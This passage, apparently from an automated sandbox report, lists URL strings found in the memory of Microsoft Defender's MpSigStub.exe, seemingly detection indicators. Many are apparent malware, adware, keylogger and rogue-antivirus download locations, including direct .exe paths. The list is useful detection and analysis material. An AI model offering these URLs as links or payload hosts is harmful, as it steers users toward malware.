Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://wordfiletransfertocustomer.mangospot.net/-.......................................-...........
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://wordgroup.bounceme.net/9cb6541e5b0d/
Source: MpSigStub.exe, 0000000B.00000003.18300431925.0000021B5E6BC000.00000004.00000001.sdmp String found in binary or memory: http://work-helper.com/files/client/OffersWizard.exex
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://world4freeblog.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18317103836.0000021B5FD58000.00000004.00000001.sdmp String found in binary or memory: http://worm.ws/
Source: MpSigStub.exe, 0000000B.00000003.18275295752.0000021B5E8EE000.00000004.00000001.sdmp String found in binary or memory: http://wsus.chrobinson.com/scriptstothelocalcomputer
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://wtfismyip.com/text)echo
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://ww.fbi.gov/worldwidedlogs/addtobase.asp
Source: MpSigStub.exe, 0000000B.00000003.18275295752.0000021B5E8EE000.00000004.00000001.sdmp String found in binary or memory: http://www-search.net/?
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp String found in binary or memory: http://www.%domain%/updates/check.html
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.%s/MyFriends.jsp
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://www.%s/mail/MailCompose.jsp
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://www.%s/mail/MailCompose.jsp?ToMemberId=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.%s/searchbar.html
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://www.114Oldest.com/zz/mm.htm
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.17173.com/
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp String found in binary or memory: http://www.178gg.com/lianjie/
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://www.180searchassistant.com/
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://www.180searchassistant.com/a
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://www.19620425.com/download_adv/file.exe
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://www.22apple.com/?utm_source=b&ch=sof&uid=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.22teens.com/
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://www.2345.com/?18181
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.2828hfdy.com/bak.txt
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://www.3000.ws/
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.3322.org/dyndns/getip
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://www.3800cc.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.455465x.com/test/IP.asp
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.4dots-software.com/installmonetizer/emptyfoldercleaner.php/silentget
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.4threquest.me/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.4threquest.me/310714d/291014_nj.exe?
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.4threquest.me/310714d/310714_br.exe?
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp String found in binary or memory: http://www.51jetso.com
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: http://www.51jetso.com/
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://www.520hack.com/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://www.52CPS.COM/goto/mm.Htm
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp String found in binary or memory: http://www.58816.com
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://www.5z8.info/--initiate-credit-card-xfer--_g5l2og_autoinstall
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.6781.com/city/
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.6781.com/navhtm/nav
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.6781.com/tools/#
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://www.77169.net/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.91880.com
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.96333.com/
Source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp String found in binary or memory: http://www.IM-Names.com/names
Source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp String found in binary or memory: http://www.IM-Names.com/namesa
Source: MpSigStub.exe, 0000000B.00000003.18290670791.0000021B5EA2C000.00000004.00000001.sdmp String found in binary or memory: http://www.KJDhendieldiouyu.COM/CFDATA.ima?ccode=%s&cfdatacc=%s&gmt=%d
Source: MpSigStub.exe, 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp String found in binary or memory: http://www.LuckyAcePoker.com/install
Source: MpSigStub.exe, 0000000B.00000003.18276905837.0000021B5FDE8000.00000004.00000001.sdmp String found in binary or memory: http://www.MalwareAlarm.com/
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://www.PCKeeper.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.PriceFountain.net/go/postinstall/?action=install&partner=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.Social2Search.com/privacy
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://www.acabogacia.org/doc0
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://www.acabogacia.org0
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.accoona.com/
Source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp String found in binary or memory: http://www.activision.com/games/wolfenstein/purchase.html
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.adsor.net/mp3player/download/playmp3/
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://www.advgoogle.blogdpot.com
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.alanga.net/
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://www.alfa-search.com/home.html
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://www.alfa-search.com/search.html
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: http://www.allatori.com
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://www.alot.com/
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.alxup.com/bin/Up.ini
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: http://www.amentosx.com/script/r.php
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://www.ancert.com/cps0
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp String found in binary or memory: http://www.antivirusxp2008.com
Source: mpam-728dfe11.exe, 00000011.00000003.18617240390.0000027770025000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/license-
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://www.applicablebeam.com/ddawdew/trjgje.exe
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://www.ardamax.com
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://www.ardamax.com/keylogger/
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://www.arfa.it/rechnung/
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://www.asianraw.com/members/vs.html
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://www.ateliedeervas.com.br/scan/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.avpro-labs.com/buy.html
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.avpro-labs.com/buy.htmlx
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.cn/baidu?
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.cn/s?
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/baidu?
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/baidu?tn=
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/cpro.php?
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/s?
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/s?wd=
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/s?wd=http://www.google.cn/search?hl=zh-CN&q=http://search.cn.yahoo.com/search?p
Source: MpSigStub.exe, 0000000B.00000003.18269858527.0000021B5F43D000.00000004.00000001.sdmp String found in binary or memory: http://www.bin32.com/check?id=1&ver=16
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: http://www.bitly.com/yeuiqwbdhasdvbhsagdhj%public%
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://www.blazehits.net/popup.
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.blazingtools.com
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.bliao.com/
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: http://www.blizzard.com/support/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.blue-series.de
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.bokee.com/
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: http://www.bonusesfound.ml/install/inst64.exe
Source: MpSigStub.exe, 0000000B.00000003.18263377234.0000021B5F335000.00000004.00000001.sdmp String found in binary or memory: http://www.bonusesfound.ml/update/index.php
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://www.bookiq.bsnl.co.in/data_entry/circulars/m
Source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp String found in binary or memory: http://www.boot-land.net/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.boukan.8m.net/AYO_Soft/Index.html
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://www.britishtotty.com/content/homepage.html
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.browserwise.com/d
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
Source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp String found in binary or memory: http://www.calyeung.com/exec/wmapop.perl
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.cashon.co.kr/app/app.php?url=
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.cashon.co.kr/app/install.php?
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.cashon.co.kr/app/uninstall.php?
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.cashon.co.kr/search/search.php
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.cashon.co.kr/search/search.phpx
Source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp String found in binary or memory: http://www.ccleaner.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.ccnnic.com/download/
Source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: http://www.certum.pl/CPS0
Source: MpSigStub.exe, 0000000B.00000003.18320877082.0000021B5E3DA000.00000004.00000001.sdmp String found in binary or memory: http://www.chambersign.org1
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.change-forgotten-password.com
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: http://www.chatzum.com/statistics/?affid=$RPT_AFFID&cztbid=$RPT_UID&inst=$RTP_SETINST&sethp=$RTP_SET
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: http://www.cheathappens.com/trainer_troubleshooting_lite.asp
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: http://www.cheathappens.com/unauthorized/
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: http://www.chmeditor.com/
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://www.ckplayer.comutf-8
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.cleveradds.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.clubnoega.com/_notes/arquivo1.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.clubnoega.com/_notes/arquivo2.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.clubnoega.com/_notes/arquivo3.exe
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.cmbchina.com/
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.cmfu.com/
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.coapr13south.com/download.php?
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.coapr13south.com/download.php?xe
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://www.codylindley.com)
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.cojulyfastdl.com/download.php?
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.cojulyfastdl.com/download.php?x
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.cojune13coast.com/download.php?
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.comar13west.com/download.php?
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.comay13north.com/download.php?
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.comay15coat.com/download.php?
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.comegoto.com/host.jpg
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp String found in binary or memory: http://www.comfm.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.comfm.comx;
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.commonname.com/find.asp?cn=
Source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp String found in binary or memory: http://www.consumerinput.com/
Source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp String found in binary or memory: http://www.consumerinput.com/xb
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.cooct13hen.com/download.php?
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.cooctdlfast.com/download.php?
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.cooctdlfast.com/download.php?x
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.copy9.com
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.cosept13jetty.com/download.php?
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.cosept14water.com/download.php?
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://www.ctuser.net
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp String found in binary or memory: http://www.cultravel.it/invoice-number-
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://www.cxgr.com/codec/play/download/playmp3/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.dandownload.com/
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.dangdang.com/
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp String found in binary or memory: http://www.darxk.com/aviatic/systema.exe
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.daybt.com/query.asp?q=%s
Source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp String found in binary or memory: http://www.dealply.com/faq/
Source: MpSigStub.exe, 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp String found in binary or memory: http://www.default-search.net/search?sid=
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://www.defence.gov.au/pki0
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://www.delta-homes.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.desktopsmiley.com/toolbar/desktopsmiley/download/
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://www.dhl.com/img/meta/dhl_logo.gif
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://www.dialerclub.com
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp String found in binary or memory: http://www.diannaowang.com:8080
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.dianping.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.direct-ip.com/
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://www.distance24.org/route.json?stops=
Source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp String found in binary or memory: http://www.djapp.info/?domain=xa
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.dk-soft.org
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://www.dnie.es/dpc0
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: http://www.dosearches.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://www.doswf.com
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: http://www.dsdsd.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/cnfg/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/cnfg/_poplkh
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/cnfg/canview.txt
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/cnfg/xh
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/count/updatedata.aspx?id=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.e-mirrorsite.com/cgi-bin/free2.cgi__asf_license_url_ends_here__
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.e-mirrorsite.com/exit/movies1.html__
Source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp String found in binary or memory: http://www.e-mirrorsite.com/exit/music
Source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp String found in binary or memory: http://www.easypoint.kr/cashback/config.php
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://www.easyspeedcheck.com/easyspeedcheck-1.php
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://www.easyspeedcheck.com/easyspeedcheck-1.phpx
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.efixpctools.com
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://www.egy8.com
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://www.egy8.comx
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://www.eomniform.com/OF5/nsplugins/OFMailX.cab
Source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp String found in binary or memory: http://www.epoolsoft.com/pchunter/x
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://www.ewrtw.pw/c/niubilityc.exe
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: http://www.eyuyan.com)
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp String found in binary or memory: http://www.f2ko.de
